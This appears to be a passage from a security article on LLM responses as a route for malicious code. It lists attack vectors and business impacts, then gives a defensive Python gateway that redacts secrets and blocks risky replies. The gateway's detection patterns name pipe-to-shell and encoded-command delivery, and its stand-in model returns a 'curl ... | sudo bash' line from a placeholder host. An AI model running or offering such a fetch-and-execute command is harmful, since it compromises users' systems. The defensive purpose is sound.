- Exploiting vulnerabilities in the model to inject malicious code into responses.
- Social engineering that steers the model into returning carefully crafted responses which look legitimate but contain links to websites or files that deliver malicious code.
- Using compromised APIs or third-party services that inject malicious code into responses.
- Data theft or manipulation: Code can be designed to steal or manipulate sensitive data, such as personal or financial information, customer records, or intellectual property (IP). Once the data has been exfiltrated, the attacker can:
  - Use the stolen data to commit identity theft or financial fraud, or to disrupt markets.
  - Sell the data or IP on the dark web.
  - Publish it on the Internet for anyone to see.
  - Do any combination of the above.
- Service disruption: Malicious code can trigger malfunctions in corporate systems. The resulting outages delay the processing of customer and vendor interactions, slow decision-making, reduce efficiency, and cost business opportunities, any of which can translate into significant financial losses for the organization.
- Reputational damage: A successful malicious code attack via an LLM could harm the company's reputation, resulting in loss of trust from customers, stockholders, regulators, partners, and other stakeholders and leading to long-term financial impacts.
- Every prompt sent to the LLM, for private, confidential, or otherwise exploitable content, so it can be blocked or redacted before it leaves the system.
- Every response returned by the LLM, for malicious code and other suspicious content, so it can be blocked before it enters the system.
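One way to implement both screens at the application boundary, added here as an example and not code from the original article: a small Python gateway that inspects each outbound prompt for secrets and PII (redacting them before the request is sent) and each inbound response for code-delivery patterns and links to hosts outside an allowlist, withholding any response that trips a rule. The regexes are illustrative heuristics rather than a complete rule set; `ALLOWED_HOSTS`, the sample prompt and the `fake_model` stand-in are constructed for the demonstration, and the AWS key ID and card number in the sample are the publicly documented test values.

```python
import re
from dataclasses import dataclass

# Constructed allowlist of hosts a response may link to; replace with your own.
ALLOWED_HOSTS = frozenset({"docs.python.org", "github.com"})

# Outbound rules: secret/PII formats that should never leave the organization.
# Illustrative patterns only; real deployments tune these to their own data.
OUTBOUND_PATTERNS = {
    "aws_access_key_id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "private_key_block": re.compile(r"-----BEGIN (?:RSA |EC |OPENSSH )?PRIVATE KEY-----"),
    "email_address": re.compile(r"\b[\w.+-]+@[\w-]+\.[\w.-]+\b"),
    # 13-19 digits with optional space/dash separators; confirmed by Luhn below.
    "payment_card_number": re.compile(r"\b\d(?:[ -]?\d){12,18}\b"),
}

# Inbound rules: response content that fetches, decodes or executes code.
INBOUND_PATTERNS = {
    "pipe_to_shell": re.compile(r"\b(?:curl|wget)\b[^\n|]*\|\s*(?:sudo\s+)?(?:ba|z)?sh\b"),
    "powershell_encoded": re.compile(r"powershell(?:\.exe)?[^\n]*?-(?:e|enc|encodedcommand)\b", re.I),
    "base64_decode_to_shell": re.compile(r"base64\s+(?:-d|--decode)[^\n]*\|\s*(?:ba|z)?sh\b"),
    "dynamic_eval": re.compile(r"\b(?:eval|exec)\s*\("),
}
URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)[^\s)\]>]*")


@dataclass(frozen=True)
class Finding:
    direction: str  # "outbound" (prompt) or "inbound" (response)
    rule: str
    snippet: str


def luhn_ok(digits: str) -> bool:
    """Luhn checksum; filters ticket and order numbers out of card-number hits."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d = d * 2 - 9 if d * 2 > 9 else d * 2
        total += d
    return total % 10 == 0


def screen_prompt(prompt: str) -> list[Finding]:
    """Scan an outbound prompt for content that must not leave the system."""
    findings = []
    for rule, pattern in OUTBOUND_PATTERNS.items():
        for m in pattern.finditer(prompt):
            if rule == "payment_card_number" and not luhn_ok(re.sub(r"[ -]", "", m.group(0))):
                continue  # digit run that is not a valid card number
            findings.append(Finding("outbound", rule, m.group(0)))
    return findings


def redact_prompt(prompt: str) -> str:
    """Replace each flagged span with a placeholder so the request can still be sent."""
    redacted = prompt
    for f in screen_prompt(prompt):
        redacted = redacted.replace(f.snippet, f"[REDACTED:{f.rule}]")
    return redacted


def screen_response(response: str, allowed_hosts: frozenset[str] = ALLOWED_HOSTS) -> list[Finding]:
    """Scan an inbound response for code-delivery patterns and links to unlisted hosts."""
    findings = []
    for rule, pattern in INBOUND_PATTERNS.items():
        for m in pattern.finditer(response):
            findings.append(Finding("inbound", rule, m.group(0)))
    for m in URL_RE.finditer(response):
        host = m.group(1).lower()
        if not any(host == h or host.endswith("." + h) for h in allowed_hosts):
            findings.append(Finding("inbound", "unlisted_url", m.group(0)))
    return findings


def guarded_exchange(prompt: str, call_model, allowed_hosts=ALLOWED_HOSTS) -> tuple[str, list[Finding]]:
    """Redact the prompt, call the model, withhold a flagged response; return text plus findings to log."""
    outbound = screen_prompt(prompt)
    response = call_model(redact_prompt(prompt))
    inbound = screen_response(response, allowed_hosts)
    if inbound:
        return "Response withheld: it was flagged by the response filter.", outbound + inbound
    return response, outbound


# Constructed inputs for a stand-alone run. AKIAIOSFODNN7EXAMPLE is AWS's documented
# example key ID and 4111 1111 1111 1111 is the standard Visa test number.
SAMPLE_PROMPT = (
    "Please debug this. My AWS key is AKIAIOSFODNN7EXAMPLE and the test card "
    "4111 1111 1111 1111 still fails for jane.doe@example.com. Ticket 2024-0012."
)


def fake_model(prompt: str) -> str:
    """Constructed stand-in for the LLM API call; returns a canned hostile reply."""
    return ("Sure. To fix this, run:\ncurl -s http://updates.example.net/fix.sh | sudo bash\n"
            "Docs: https://docs.python.org/3/library/subprocess.html\n")


if __name__ == "__main__":
    shown, findings = guarded_exchange(SAMPLE_PROMPT, fake_model)
    print(shown)
    for f in findings:
        print(f"{f.direction:8} {f.rule:22} {f.snippet!r}")
```

Run as-is, the gateway redacts the key, the card number and the e-mail address from the prompt, then withholds the model's reply because it pipes a download into a shell and links to a host outside the allowlist. Both sets of findings are returned rather than only printed so they can be forwarded to the SIEM; a burst of outbound secret hits or inbound `pipe_to_shell` hits is itself a detection signal. Pattern matching like this is a floor, not a ceiling: the inbound rules will miss novel delivery techniques and the `dynamic_eval` rule will flag legitimate code, so tune them to your environment and pair them with allowlisting of the tools and hosts the assistant is permitted to reference.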